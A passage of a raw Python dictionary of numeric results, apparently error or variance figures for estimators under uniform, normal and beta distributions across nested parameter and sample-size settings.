'beta2': 0.29080653527776035, 'beta4': 0.17337872442507027}, 50: {'uni': 0.20975717836080796, 'nor': 0.2565379219984574, 'beta1': 0.20800987078537114, 'beta2': 0.2600989628289811, 'beta4': 0.18429779524384918}, 30: {'uni': 0.20720342119680604, 'nor': 0.24088086582328805, 'beta1': 0.20748583588931385, 'beta2': 0.24007860960850408, 'beta4': 0.19211149401323768}, 20: {'uni': 0.20755790128204296, 'nor': 0.22922666615794668, 'beta1': 0.21085331137645344, 'beta2': 0.2271126160773065, 'beta4': 0.19726350188991543}, 10: {'uni': 0.2115436004822682, 'nor': 0.21966947518702792, 'beta1': 0.21107364597857337, 'beta2': 0.22048945023217323, 'beta4': 0.20507045435880536}}, 100: {1000: {'uni': 0.21967845045275625, 'nor': 1.656278094432771, 'beta1': 0.21090054785594217, 'beta2': 1.405234644927156, 'beta4': 0.1134712510665932}, 750: {'uni': 0.2182058622345823, 'nor': 
1.265623071214558, 'beta1': 0.21028572752611807, 'beta2': 1.1279524417411784, 'beta4': 0.11526715616074444}, 500: {'uni': 0.21472950659279263, 'nor': 0.9157340420582806, 'beta1': 0.20915259969907926, 'beta2': 0.8857345708052237, 'beta4': 0.11958569682583288}, 400: {'uni': 0.21489446434289045, 'nor': 0.7677784731205918, 'beta1': 0.21081206178893352, 'beta2': 0.7609743126081624, 'beta4': 0.12541109277349732}, 300: {'uni': 0.2159893589251412, 'nor': 0.6256342238393243, 'beta1': 0.20763666455794746, 'beta2': 0.6119368944285761, 'beta4': 0.13023773680445308}, 200: {'uni': 0.2091742902933585, 'nor': 0.48879729015887435, 'beta1': 0.20831908379432781, 'beta2': 0.4888715032902842, 'beta4': 0.13778468684559775}, 150: {'uni': 0.2090160321323569, 'nor': 0.4187490294676396, 'beta1': 0.2109398590174564, 'beta2': 0.43024124336877606, 'beta4': 0.1462052336856702}, 100: {'uni': 0.2104322507772914, 'nor': 0.35145353863818374, 'beta1': 0.2078275315127688, 'beta2': 0.3527286738203107, 'beta4': 0.15819495462335323}, 75: {'uni': 0.20969432604237917, 'nor': 0.3190469158495116, 'beta1': 0.2123788151559664, 'beta2': 0.31885461616358585, 'beta4': 0.16304448328983254}, 50: {'uni': 0.2087204645903672, 'nor': 0.2784565063957156, 'beta1': 0.20898686396465999, 'beta2': 0.2724721715932801, 'beta4': 0.1748949757811885}, 30: {'uni': 0.21180576782357857, 'nor': 0.2510792661255587, 'beta1': 0.21157574079679234, 'beta2': 0.2492653810399887, 'beta4': 0.18637405643646768}, 20: {'uni': 0.20986822684158538, 'nor': 0.24044968609243367, 'beta1': 0.20976936068946686, 'beta2': 0.22969757707032978, 'beta4': 0.1933966348868532}, 10: {'uni': 0.2092931057812649, 'nor': 0.2274358627877835, 'beta1': 0.20973251389792952, 'beta2': 0.22006451815316508, 'beta4': 0.20444803640329232}}, 75: {1000: {'uni': 0.23513931545998662, 'nor': 2.084909469742905, 'beta1': 0.21014505352475218, 'beta2': 1.5806301519779993, 'beta4': 0.10998758656318001}, 750: {'uni': 0.2286541491929865, 'nor': 1.6373557492661108, 'beta1': 
0.20978951011443275, 'beta2': 1.2456465113380724, 'beta4': 0.11259632219485577}, 500: {'uni': 0.22247281469777053, 'nor': 1.150511057022818, 'beta1': 0.2073585482490993, 'beta2': 0.9812552247229969, 'beta4': 0.11625486022546717}, 400: {'uni': 0.21951372585892182, 'nor': 0.9569843642606499, 'beta1': 0.20823968509523264, 'beta2': 0.8066142797690702, 'beta4': 0.12044519385671562}, 300: {'uni': 0.21781287693048623, 'nor': 0.7725858773053905, 'beta1': 0.21194743463485233, 'beta2': 0.6922651737298109, 'beta4': 0.12461002806743086}, 200: {'uni': 0.21199124103966535, 'nor': 0.580982989647824, 'beta1': 0.20939209173887577, 'beta2': 0.5462914146214966, 'beta4': 0.13270550013960777}, 150: {'uni': 0.21252879710179673, 'nor': 0.4987347923010613, 'beta1': 0.20783211493381504, 'beta2': 0.45356054189282985, 'beta4': 0.13809523671194257}, 100: {'uni': 0.2089361893031747, 'nor': 0.403915226761567, 'beta1': 0.2093217404846438, 'beta2': 0.38016607644734646, 'beta4': 0.14840466776444083}, 75: {'uni': 0.2081440553080188, 'nor': 0.35109507781411226, 'beta1': 0.20929729980155615, 'beta2': 0.3327341468495961, 'beta4': 0.1540449114797875}, 50: {'uni': 0.20581675234683908, 'nor': 0.30206067979551837, 'beta1': 0.21021696834721026, 'beta2': 0.2861955478547944, 'beta4': 0.16633361029387916}, 30: {'uni': 0.20734524509571534, 'nor': 0.267037913698908, 'beta1': 0.2070263091653566, 'beta2': 0.25806159877220175, 'beta4': 0.17863030675847164}, 20: {'uni': 0.2096733930631222, 'nor': 0.2460070167669823, 'beta1': 0.20871469364964274, 'beta2': 0.2372662315858424, 'beta4': 0.1892580676002318}, 10: {'uni': 0.20922208007633622, 'nor': 0.23213075562898852, 'beta1': 0.21070476962686652, 'beta2': 0.2225315024021926, 'beta4': 0.19641028263808016}}, 50: {1000: {'uni': 0.2695254349236613, 'nor': 3.142691210261647, 'beta1': 0.21770786185287255, 'beta2': 1.9099319895352667, 'beta4': 0.10829969370253238}, 750: {'uni': 0.2588039542291625, 'nor': 2.4104366375812973, 'beta1': 0.21243577719321954, 'beta2': 
1.5161955837891, 'beta4': 0.11111092000239313}, 500: {'uni': 0.24151301038044345, 'nor': 1.642139887107223, 'beta1': 0.20971867796492333, 'beta2': 1.1517381077121902, 'beta4': 0.11227898068455419}, 400: {'uni': 0.23019437797823078, 'nor': 1.3289789466534643, 'beta1': 0.20926242715400342, 'beta2': 0.9729778013434685, 'beta4': 0.11417269932418249}, 300: {'uni': 0.22430893764793297, 'nor': 1.0745150609309957, 'beta1': 0.21074805474629227, 'beta2': 0.7874596109511961, 'beta4': 0.11759814856362567}, 200: {'uni': 0.21975399445220514, 'nor': 0.7819720121056168, 'beta1': 0.21103937980028964, 'beta2': 0.6018534363417153, 'beta4': 0.12339286742106902}, 150: {'uni': 0.21535142554197367, 'nor': 0.6399318456941945, 'beta1': 0.20746526428424497, 'beta2': 0.5252845548984273, 'beta4': 0.1299381165608297}, 100: {'uni': 0.2123454504262325, 'nor': 0.49216704078244555, 'beta1': 0.2107022782636202, 'beta2': 0.4230176226912828, 'beta4': 0.1378036793670446}, 75: {'uni': 0.21339732015322407, 'nor': 0.43149068654833117, 'beta1': 0.21058764807741492, 'beta2': 0.3671011243377202, 'beta4': 0.14620561061096438}, 50: {'uni': 0.205847661172318, 'nor': 0.35582897249323403, 'beta1': 0.20909648270681516, 'beta2': 0.31178396791388713, 'beta4': 0.15722296123371624}, 30: {'uni': 0.20934069442572217, 'nor': 0.29138119383616384, 'beta1': 0.20982580627900296, 'beta2': 0.26854176799687446, 'beta4': 0.17071014481863203}, 20: {'uni': 0.20668196194747926, 'nor': 0.26568332305135134, 'beta1': 0.2093142297545193, 'beta2': 0.24526630860745893, 'beta4': 0.17811324491132643}, 10: {'uni': 0.20958328438574503, 'nor': 0.23896053895205074, 'beta1': 0.20621410607741605, 'beta2': 0.22919187002100394, 'beta4': 0.19431842828786478}}, 30: {1000: {'uni': 0.39110763945461735, 'nor': 5.116424860683267, 'beta1': 0.2276039800167104, 'beta2': 2.4580179105664364, 'beta4': 0.1066835465038891}, 750: {'uni': 0.3418714368913198, 'nor': 3.8744007700100593, 'beta1': 0.22395548891655492, 'beta2': 2.0103017113808224, 'beta4': 
0.10947374482580367}, 500: {'uni': 0.2975942162732659, 'nor': 2.6218136300691874, 'beta1': 0.21825444046578688, 'beta2': 1.3847556622818173, 'beta4': 0.10899418892034965}, 400: {'uni': 0.27461362852151405, 'nor': 2.1151034436155616, 'beta1': 0.2171198331223813, 'beta2': 1.2167467458708006, 'beta4': 0.11163855842113928}, 300: {'uni': 0.2543881091715356, 'nor': 1.6452365204119028, 'beta1': 0.212256506611666, 'beta2': 0.9687476062374452, 'beta4': 0.1115492019613656}, 200: {'uni': 0.2363522619554879, 'nor': 1.1677455360609652, 'beta1': 0.20966125872182179, 'beta2': 0.7425629231901374, 'beta4': 0.11625099173205072}, 150: {'uni': 0.2284148219949321, 'nor': 0.9574829237962695, 'beta1': 0.21023861819542058, 'beta2': 0.6139346611358466, 'beta4': 0.12009639988691045}, 100: {'uni': 0.22172498485669878, 'nor': 0.6915027995999989, 'beta1': 0.20918706109846394, 'beta2': 0.4869056843738299, 'beta4': 0.12638594109716492}, 75: {'uni': 0.2133168698992867, 'nor': 0.5682112038946274, 'beta1': 0.20975000504788754, 'beta2': 0.415282241094064, 'beta4': 0.13226527569518623}, 50: {'uni': 0.2102271307152469, 'nor': 0.44595128782042287, 'beta1': 0.20889065230992968, 'beta2': 0.3465767337644295, 'beta4': 0.14070658143472944}, 30: {'uni': 0.2081426512303808, 'nor': 0.35207891188712104, 'beta1': 0.20871532977976312, 'beta2': 0.29316990128238446, 'beta4': 0.15666183548008356}, 20: {'uni': 0.20613997335614362, 'nor': 0.30583981878707406, 'beta1': 0.20836781704793886, 'beta2': 0.2598156056480911, 'beta4': 0.16790033081050695}, 10: {'uni': 0.20923753020638328, 'nor': 0.2612046113020479, 'beta1': 0.20989685334843394, 'beta2': 0.23114069560918055, 'beta4': 0.1835407880975625}}, 20: {1000: {'uni': 0.6207826394599372, 'nor': 7.622424720173352, 'beta1': 0.27350677793760486, 'beta2': 3.3492996942172333, 'beta4': 0.10628262555709497}, 750: {'uni': 0.5048166737138563, 'nor': 5.758152270393112, 'beta1': 0.2554155723862364, 'beta2': 2.628076590546046, 'beta4': 0.10565019639609735}, 500: {'uni': 
0.3994453354156638, 'nor': 3.893980758511552, 'beta1': 0.23597727883342787, 'beta2': 1.8214218995092328, 'beta4': 0.1070101907165029}, 400: {'uni': 0.36101676480694145, 'nor': 3.2044600872159323, 'beta1': 0.23459375200447094, 'beta2': 1.5251543211986895, 'beta4': 0.10821295023254038}, 300: {'uni': 0.3141921739962661, 'nor': 2.4222433418314364, 'beta1': 0.2253430945453138, 'beta2': 1.1967541480073822, 'beta4': 0.1099708991006131}, 200: {'uni': 0.27835872559274455, 'nor': 1.681652690097508, 'beta1': 0.21894420597565414, 'beta2': 0.8889375477356823, 'beta4': 0.11351788787975257}, 150: {'uni': 0.2559570089433474, 'nor': 1.3438963170616764, 'beta1': 0.21477483270291053, 'beta2': 0.7257408247226198, 'beta4': 0.11394879683852287}, 100: {'uni': 0.23822025966558683, 'nor': 0.9711825862107801, 'beta1': 0.20802563703769897, 'beta2': 0.5623026745072711, 'beta4': 0.12026175575681236}, 75: {'uni': 0.2293403279687202, 'nor': 0.7729220747351444, 'beta1': 0.21100752732670153, 'beta2': 0.48330787981629864, 'beta4': 0.12382986936052359}, 50: {'uni': 0.21915378007158956, 'nor': 0.5693299836933317, 'beta1': 0.2078415744294394, 'beta2': 0.38674682907023844, 'beta4': 0.13204002010791535}, 30: {'uni': 0.2082265622167124, 'nor': 0.43443417831024433, 'beta1': 0.20687391089208745, 'beta2': 0.31119395493380003, 'beta4': 0.1431516191386846}, 20: {'uni': 0.20786603570028708, 'nor': 0.3572940044777373, 'beta1': 0.20719910244124543, 'beta2': 0.27721462641843725, 'beta4': 0.1572608236251125}, 10: {'uni': 0.20369256732614355, 'nor': 0.28182536192865026, 'beta1': 0.20756249721014605, 'beta2': 0.2385183054251573, 'beta4': 0.1697626070090186}}, 10: {1000: {'uni': 1.7848701057995784, 'nor': 15.635739381402702, 'beta1': 0.7153891703487703, 'beta2': 5.697088420798187, 'beta4': 0.10421112845871394}, 750: {'uni': 1.3727979678132771, 'nor': 11.906755261463388, 'beta1': 0.5779728985731243, 'beta2': 4.449716590642079, 'beta4': 0.10498414486075403}, 500: {'uni': 0.9573992786589071, 'nor': 7.970320890499278, 
'beta1': 0.43798339579132395, 'beta2': 2.974231536993935, 'beta4': 0.105026735404256}, 400: {'uni': 0.7914977735882762, 'nor': 6.440897945489786, 'beta1': 0.39007392596960755, 'beta2': 2.429667687774588, 'beta4': 0.10605337636852458}, 300: {'uni': 0.631330878442672, 'nor': 4.933284287935752, 'beta1': 0.33438904339835235, 'beta2': 1.877753461391385, 'beta4': 0.1073668070340185}, 200: {'uni': 0.48173020420613244, 'nor': 3.3803827492127008, 'beta1': 0.28744959584371677, 'beta2': 1.3439600818077662, 'beta4': 0.10776359310849748}, 150: {'uni': 0.40031324179507105, 'nor': 2.57622592994642, 'beta1': 0.26035189199173386, 'beta2': 1.0427967524110597, 'beta4': 0.11000574720566421}, 100: {'uni': 0.3308720201998832, 'nor': 1.7649850100433184, 'beta1': 0.2383561944351031, 'beta2': 0.7771083680176007, 'beta4': 0.11235247896090703}, 75: {'uni': 0.2865533700253337, 'nor': 1.3593086400799728, 'beta1': 0.23083619480349551, 'beta2': 0.6354900601807595, 'beta4': 0.1136946403621595}, 50: {'uni': 0.25864424310430745, 'nor': 0.9824603279253074, 'beta1': 0.22334506582001382, 'beta2': 0.49223837414214233, 'beta4': 0.12081061110449474}, 30: {'uni': 0.22836973422604787, 'nor': 0.676619660745287, 'beta1': 0.20951021970104433, 'beta2': 0.3741306279869527, 'beta4': 0.12652156529997072}, 20: {'uni': 0.21515643043692204, 'nor': 0.5180809461964594, 'beta1': 0.20397488858742926, 'beta2': 0.3088295715698039, 'beta4': 0.13725565024846206}, 10: {'uni': 0.20341357315487396, 'nor': 0.3736834213121383, 'beta1': 0.20162371182875433, 'beta2': 0.24957048788715058, 'beta4': 0.15490910948174905}}}, 0.3: {1000: {1000: {'uni': 0.18428871913527797, 'nor': 0.30135078484266026, 'beta1': 0.18393654917719088, 'beta2': 0.6623093381207533, 'beta4': 0.14032810218137845}, 750: {'uni': 0.18262805116604833, 'nor': 0.27195486539150565, 'beta1': 0.18602130658962418, 'beta2': 0.4878718144267021, 'beta4': 0.14691168329765347}, 500: {'uni': 0.18356636941170307, 'nor': 0.2416953142020874, 'beta1': 0.18423960757549646, 'beta2': 
0.357987213680477, 'beta4': 0.15566079017126216}, 400: {'uni': 0.18398269310746806, 'nor': 0.23033211237917395, 'beta1': 0.18313599133249095, 'beta2': 0.31498091495327957, 'beta4': 0.15747557950230512}, 300: {'uni': 0.18359581287903043, 'nor': 0.21664672148715478, 'beta1': 0.1859716509858502, 'beta2': 0.27672572480296337, 'beta4': 0.16484989128991967}, 200: {'uni': 0.18292786874448827, 'nor': 0.20406786775434288, 'beta1': 0.1842414647509748, 'beta2': 0.24027300035558413, 'beta4': 0.1699466212939197}, 150: {'uni': 0.18455107320985933, 'nor': 0.20188485575373824, 'beta1': 0.18479437012880134, 'beta2': 0.22923323632544906, 'beta4': 0.16924173674935705}, 100: {'uni': 0.18513992851403205, 'nor': 0.19487665525991182, 'beta1': 0.18489669398913675, 'beta2': 0.20828847343235687, 'beta4': 0.17566406407424956}, 75: {'uni': 0.1865632455464677, 'nor': 0.19358711616627014, 'beta1': 0.18565141251922007, 'beta2': 0.20582303873952032, 'beta4': 0.1791155456720297}, 50: {'uni': 0.18426457302663726, 'nor': 0.1916482647518717, 'beta1': 0.1852315833036702, 'beta2': 0.19764339843274478, 'beta4': 0.18112274314507698}, 30: {'uni': 0.18349819467351894, 'nor': 0.1888489836368484, 'beta1': 0.18261593670270432, 'beta2': 0.19034464682698157, 'beta4': 0.18224418746461715}, 20: {'uni': 0.1820714679130019, 'nor': 0.18754105929514656, 'beta1': 0.18430122581588568, 'beta2': 0.1920075339274084, 'beta4': 0.1834021882349476}, 10: {'uni': 0.18739411665561917, 'nor': 0.18497627238155476, 'beta1': 0.18440842636140978, 'beta2': 0.18841016365805804, 'beta4': 0.1846995716387348}}, 750: {1000: {'uni': 0.18374768272406486, 'nor': 0.3362941599325207, 'beta1': 0.18340789412067696, 'beta2': 0.664773656168264, 'beta4': 0.13309238170252863}, 750: {'uni': 0.18528145820779707, 'nor': 0.30013344141016346, 'beta1': 0.1831987566147265, 'beta2': 0.5032347489310731, 'beta4': 0.1410482071937854}, 500: {'uni': 0.18484168589686367, 'nor': 0.2605615429499437, 'beta1': 0.18463915891771657, 'beta2': 0.3713535347423807, 'beta4': 
0.14822832304391478}, 400: {'uni': 0.18311116918143328, 'nor': 0.2459445558763436, 'beta1': 0.1845402672165048, 'beta2': 0.31907073757767096, 'beta4': 0.15317162329719258}, 300: {'uni': 0.18617543522232655, 'nor': 0.2298916232269604, 'beta1': 0.18461903342585026, 'beta2': 0.28363567342745244, 'beta4': 0.16036130415744101}, 200: {'uni': 0.18393910883726228, 'nor': 0.21640952080746054, 'beta1': 0.1818765723127742, 'beta2': 0.25012191141345425, 'beta4': 0.16552665865239316}, 150: {'uni': 0.18417926544247398, 'nor': 0.21092728516574843, 'beta1': 0.18212118551922038, 'beta2': 0.23142014151434875, 'beta4': 0.17002055544787953}, 100: {'uni': 0.18660805942978306, 'nor': 0.20081262797470406, 'beta1': 0.18602127924312306, 'beta2': 0.21271648680506355, 'beta4': 0.17563839287175947}, 75: {'uni': 0.18251540717557313, 'nor': 0.19535814734848456, 'beta1': 0.18595619280052217, 'beta2': 0.20594100979366686, 'beta4': 0.17820076426208542}, 50: {'uni': 0.18539776665656268, 'nor': 0.18951186752224017, 'beta1': 0.1852697716498855, 'beta2': 0.19992731375199027, 'beta4': 0.1784937421131358}, 30: {'uni': 0.18536533904676694, 'nor': 0.18935679046326837, 'beta1': 0.1841613478222738, 'beta2': 0.1916231974678531, 'beta4': 0.18187773474697502}, 20: {'uni': 0.1848315245851324, 'nor': 0.18898711958365183, 'beta1': 0.18464481892838294, 'beta2': 0.19085126812258635, 'beta4': 0.1811843211494424}, 10: {'uni': 0.18587075842322476, 'nor': 0.18597838609621442, 'beta1': 0.18573865004138826, 'beta2': 0.18763548127142246, 'beta4': 0.18370702416582232}}, 500: {1000: {'uni': 0.1840197346218617, 'nor': 0.41329662361079555, 'beta1': 0.18357700766562535, 'beta2': 0.7671344496261001, 'beta4': 0.1239289639044978}, 750: {'uni': 0.1862202743865642, 'nor': 0.3558982422843902, 'beta1': 0.18378140850915506, 'beta2': 0.564532583117132, 'beta4': 0.13340893800976383}, 500: {'uni': 0.1867485748124686, 'nor': 0.2977486468510908, 'beta1': 0.18390546912974548, 'beta2': 0.4195979083937472, 'beta4': 0.14038875085337116}, 400: 
{'uni': 0.18301639686674334, 'nor': 0.2769565773370171, 'beta1': 0.18366710919376103, 'beta2': 0.3628265004684875, 'beta4': 0.14451613900496404}, 300: {'uni': 0.18217744868887228, 'nor': 0.25629722024533996, 'beta1': 0.18385836640021477, 'beta2': 0.3176579397228085, 'beta4': 0.1524618313858445}, 200: {'uni': 0.18381375844550923, 'nor': 0.23550026000616722, 'beta1': 0.18438255429091854, 'beta2': 0.2656404724828914, 'beta4': 0.16063694634139747}, 150: {'uni': 0.185767292870415, 'nor': 0.21655429857888203, 'beta1': 0.18544627228662178, 'beta2': 0.24932819367864345, 'beta4': 0.16092725112085177}, 100: {'uni': 0.183824799626394, 'nor': 0.20477567037634878, 'beta1': 0.18240757458040802, 'beta2': 0.2309883526806697, 'beta4': 0.16967806719643808}, 75: {'uni': 0.18605984660927738, 'nor': 0.2028444202047503, 'beta1': 0.18483867144383112, 'beta2': 0.21138880444392175, 'beta4': 0.17257719810968203}, 50: {'uni': 0.1839877971831852, 'nor': 0.19904840183947525, 'beta1': 0.18435011648014876, 'beta2': 0.2031296680146621, 'beta4': 0.17697434657873212}, 30: {'uni': 0.1852975402896129, 'nor': 0.1937864670123576, 'beta1': 0.1844117140912648, 'beta2': 0.19398025817323694, 'beta4': 0.1787671102793916}, 20: {'uni': 0.1835863762986978, 'nor': 0.18775276741046626, 'beta1': 0.1854475463987617, 'beta2': 0.19424887742008315, 'beta4': 0.1825324678833545}, 10: {'uni': 0.18547874179765314, 'nor': 0.18647231053828683, 'beta1': 0.18691385489683274, 'beta2': 0.18948179328044443, 'beta4': 0.18672470390138896}}, 400: {1000: {'uni': 0.1841369848304773, 'nor': 0.487660743593779, 'beta1': 0.18603853288523334, 'beta2': 0.7559165215470582, 'beta4': 0.12068379560836835}, 750: {'uni': 0.18594200781108275, 'nor': 0.4019961108476163, 'beta1': 0.1831083524376866, 'beta2': 0.5621271751603673, 'beta4': 0.12505172473964998}, 500: {'uni': 0.18127077759894958, 'nor': 0.33508422714167163, 'beta1': 0.18535703359501093, 'beta2': 0.41486646451853243, 'beta4': 0.13358961945450476}, 400: {'uni': 0.18847261367235257, 
'nor': 0.30475927406457665, 'beta1': 0.18497037370002964, 'beta2': 0.36875432228911315, 'beta4': 0.14131860591700407}, 300: {'uni': 0.1834846960752523, 'nor': 0.27353443866255184, 'beta1': 0.1834736799127996, 'beta2': 0.3187931017458791, 'beta4': 0.14680948452922632}, 200: {'uni': 0.18409437296619705, 'nor': 0.24217133661747858, 'beta1': 0.18522243948305703, 'beta2': 0.28587114638809447, 'beta4': 0.15505648619089624}, 150: {'uni': 0.18244003118893568, 'nor': 0.226720503763241, 'beta1': 0.18452371980644955, 'beta2': 0.2611888455461119, 'beta4': 0.16155402213844164}, 100: {'uni': 0.18514469973669406, 'nor': 0.21427742853579504, 'beta1': 0.1851360561865889, 'beta2': 0.22915500414895795, 'beta4': 0.16887082288872826}, 75: {'uni': 0.1835023368961724, 'nor': 0.20486594519436654, 'beta1': 0.18377651974601344, 'beta2': 0.21901133656471286, 'beta4': 0.17287421533479064}, 50: {'uni': 0.18342146941233753, 'nor': 0.19818564803314914, 'beta1': 0.18651883278191514, 'beta2': 0.20678119783042662, 'beta4': 0.1747652506641469}, 30: {'uni': 0.18552948646943832, 'nor': 0.1935765150016701, 'beta1': 0.18278857493937808, 'beta2': 0.19611341856361825, 'beta4': 0.17788395999027673}, 20: {'uni': 0.1854587786790248, 'nor': 0.1919505201797072, 'beta1': 0.18541896834325705, 'beta2': 0.19533887086414536, 'beta4': 0.18198315689749184}, 10: {'uni': 0.18885914557340622, 'nor': 0.18992736227894721, 'beta1': 0.1849685952581873, 'beta2': 0.19142863221490666, 'beta4': 0.18437904185055504}}, 300: {1000: {'uni': 0.1859502958978716, 'nor': 0.572254915990919, 'beta1': 0.18506222558285604, 'beta2': 0.8127163948003021, 'beta4': 0.11600632777201067}, 750: {'uni': 0.18353876060887495, 'nor': 0.47315381492266284, 'beta1': 0.1848466855593917, 'beta2': 0.6057402676429029, 'beta4': 0.12128921997929693}, 500: {'uni': 0.18626459428841338, 'nor': 0.3739859643670168, 'beta1': 0.18370108978687505, 'beta2': 0.4519785398696026, 'beta4': 0.12934443321886013}, 400: {'uni': 0.1846926635410675, 'nor': 0.3373977956534747, 
'beta1': 0.18379894550505346, 'beta2': 0.4001772516695409, 'beta4': 0.1324871096490525}, 300: {'uni': 0.18335882742457615, 'nor': 0.30207061691602766, 'beta1': 0.18498395112897797, 'beta2': 0.36823738539844797, 'beta4': 0.1377813467667352}, 200: {'uni': 0.18146517018597558, 'nor': 0.2626023742570726, 'beta1': 0.18490638293978268, 'beta2': 0.3032691430926139, 'beta4': 0.14811129872849652}, 150: {'uni': 0.18567150605670413, 'nor': 0.24293312006244636, 'beta1': 0.1839383721262982, 'beta2': 0.275147983363257, 'beta4': 0.15562446570752247}, 100: {'uni': 0.18188590503553012, 'nor': 0.22192190869354672, 'beta1': 0.18220796971542047, 'beta2': 0.23656612557764944, 'beta4': 0.16384483291051324}, 75: {'uni': 0.18269712408432776, 'nor': 0.21086971209758135, 'beta1': 0.1834266929677532, 'beta2': 0.22384625002314135, 'beta4': 0.16689861495602365}, 50: {'uni': 0.1840829104983384, 'nor': 0.20409631279707927, 'beta1': 0.18537818691491365, 'beta2': 0.21037244642654657, 'beta4': 0.17260776897824953}, 30: {'uni': 0.1857425742322888, 'nor': 0.19571874411864754, 'beta1': 0.1841318534190506, 'beta2': 0.19779885160629435, 'beta4': 0.17876031436503564}, 20: {'uni': 0.1832365591664123, 'nor': 0.19167311662078532, 'beta1': 0.18394313243440424, 'beta2': 0.19630589705739027, 'beta4': 0.17733581077369834}, 10: {'uni': 0.18618532512109023, 'nor': 0.19128318068045697, 'beta1': 0.18757253910951685, 'beta2': 0.1883616111678228, 'beta4': 0.18555417888606063}}, 200: {1000: {'uni': 0.18447141627562533, 'nor': 0.7699551232189373, 'beta1': 0.18500514582732694, 'beta2': 0.9127793666354577, 'beta4': 0.11011784883611928}, 750: {'uni': 0.18259356525682377, 'nor': 0.6257554784789408, 'beta1': 0.18488440955510677, 'beta2': 0.7088043074557446, 'beta4': 0.11359776947078477}, 500: {'uni': 0.18589358539985096, 'nor': 0.4829959037714713, 'beta1': 0.183474877505319, 'beta2': 0.514168880108097, 'beta4': 0.11953892464970942}, 400: {'uni': 0.18351796321070915, 'nor': 0.4164296854250865, 'beta1': 0.18195958720877065, 
'beta2': 0.5056205486626194, 'beta4': 0.12416969797920921}, 300: {'uni': 0.18481464734448674, 'nor': 0.3658259098465722, 'beta1': 0.18663125274408293, 'beta2': 0.416910138713319, 'beta4': 0.13056310975294855}, 200: {'uni': 0.18530334268616938, 'nor': 0.302407317725596, 'beta1': 0.1834849866924257, 'beta2': 0.3292982361018997, 'beta4': 0.13984005968045923}, 150: {'uni': 0.18596448269266944, 'nor': 0.2739436092802089, 'beta1': 0.18707957912766168, 'beta2': 0.30543377100001085, 'beta4': 0.14629701832782}, 100: {'uni': 0.1832977085363229, 'nor': 0.23946363968388915, 'beta1': 0.18427350012102758, 'beta2': 0.2591834715329377, 'beta4': 0.15533563468189326}, 75: {'uni': 0.18356926635465065, 'nor': 0.2279517116490053, 'beta1': 0.1830851794256456, 'beta2': 0.23633947470700803, 'beta4': 0.16177484111825208}, 50: {'uni': 0.18425403756506012, 'nor': 0.2157915511740745, 'beta1': 0.1820152616826392, 'beta2': 0.21828882661440663, 'beta4': 0.16842779941176925}, 30: {'uni': 0.18360266531359176, 'nor': 0.20210998834312802, 'beta1': 0.18687171669955455, 'beta2': 0.20496758550143304, 'beta4': 0.17293751761529214}, 20: {'uni': 0.1851863710681571, 'nor': 0.19433366890581394, 'beta1': 0.18557623225739414, 'beta2': 0.19875199384282216, 'beta4': 0.17788405593123227}, 10: {'uni': 0.18634472764248708, 'nor': 0.19324764133732816, 'beta1': 0.18562771164336173, 'beta2': 0.19080409259813716, 'beta4': 0.18110054533211944}}, 150: {1000: {'uni': 0.1912754452360089, 'nor': 0.9625954838302346, 'beta1': 0.1850480515459952, 'beta2': 1.0300633923301075, 'beta4': 0.10637413003748875}, 750: {'uni': 0.18945058480162008, 'nor': 0.7695073156807593, 'beta1': 0.18526507906977255, 'beta2': 0.8083193173277922, 'beta4': 0.1106638358872608}, 500: {'uni': 0.185620108086503, 'nor': 0.5726722059040364, 'beta1': 0.18357606652829983, 'beta2': 0.6528292568827052, 'beta4': 0.11579632790357713}, 400: {'uni': 0.18917591701097058, 'nor': 0.49529277931636245, 'beta1': 0.1834642136948372, 'beta2': 0.5381420829901148, 'beta4': 
0.12006342755769683}, 300: {'uni': 0.18687744942049392, 'nor': 0.419608439413199, 'beta1': 0.18478819848060082, 'beta2': 0.45118218759273077, 'beta4': 0.1258962883197106}, 200: {'uni': 0.18418101094464367, 'nor': 0.33878294396897896, 'beta1': 0.1829759224784113, 'beta2': 0.37076816072824964, 'beta4': 0.13532357390907895}, 150: {'uni': 0.18418481072808665, 'nor': 0.29815778996985826, 'beta1': 0.18625340494055306, 'beta2': 0.3241801066525806, 'beta4': 0.13951205890829702}, 100: {'uni': 0.18327140323275803, 'nor': 0.26188762705474206, 'beta1': 0.18344353301364413, 'beta2': 0.2752468213062559, 'beta4': 0.1503016146561893}, 75: {'uni': 0.18201478524070183, 'nor': 0.24581445083697057, 'beta1': 0.1853887999165348, 'beta2': 0.2445694630913998, 'beta4': 0.15565064425067696}, 50: {'uni': 0.18452051279131734, 'nor': 0.222129436245253, 'beta1': 0.18516263138095312, 'beta2': 0.22467151056734352, 'beta4': 0.16108458373940354}, 30: {'uni': 0.1824891516495398, 'nor': 0.2053607180567544, 'beta1': 0.18509905830949186, 'beta2': 0.20779712298354724, 'beta4': 0.1699616752517214}, 20: {'uni': 0.18300669688455398, 'nor': 0.20274525612006072, 'beta1': 0.18328208302262802, 'beta2': 0.19765528888056297, 'beta4': 0.17491649721982203}, 10: {'uni': 0.1848066711618625, 'nor': 0.19231164434042297, 'beta1': 0.18438331438611105, 'beta2': 0.19484072521797707, 'beta4': 0.17971946823829243}}, 100: {1000: {'uni': 0.19811466492827273, 'nor': 1.3512753542524134, 'beta1': 0.18272420510815907, 'beta2': 1.1851946304410805, 'beta4': 0.1021515448919693}, 750: {'uni': 0.19486636364500992, 'nor': 1.0795208594455619, 'beta1': 0.1827435190842583, 'beta2': 0.8879856010389023, 'beta4': 0.10578996546915725}, 500: {'uni': 0.1878660706186934, 'nor': 0.7908944071120905, 'beta1': 0.18372014934617817, 'beta2': 0.7190908861845601, 'beta4': 0.10798328428429449}, 400: {'uni': 0.18856719881543738, 'nor': 0.6515181196215094, 'beta1': 0.18257792204790377, 'beta2': 0.6089945179002064, 'beta4': 0.11172974205029101}, 300: 
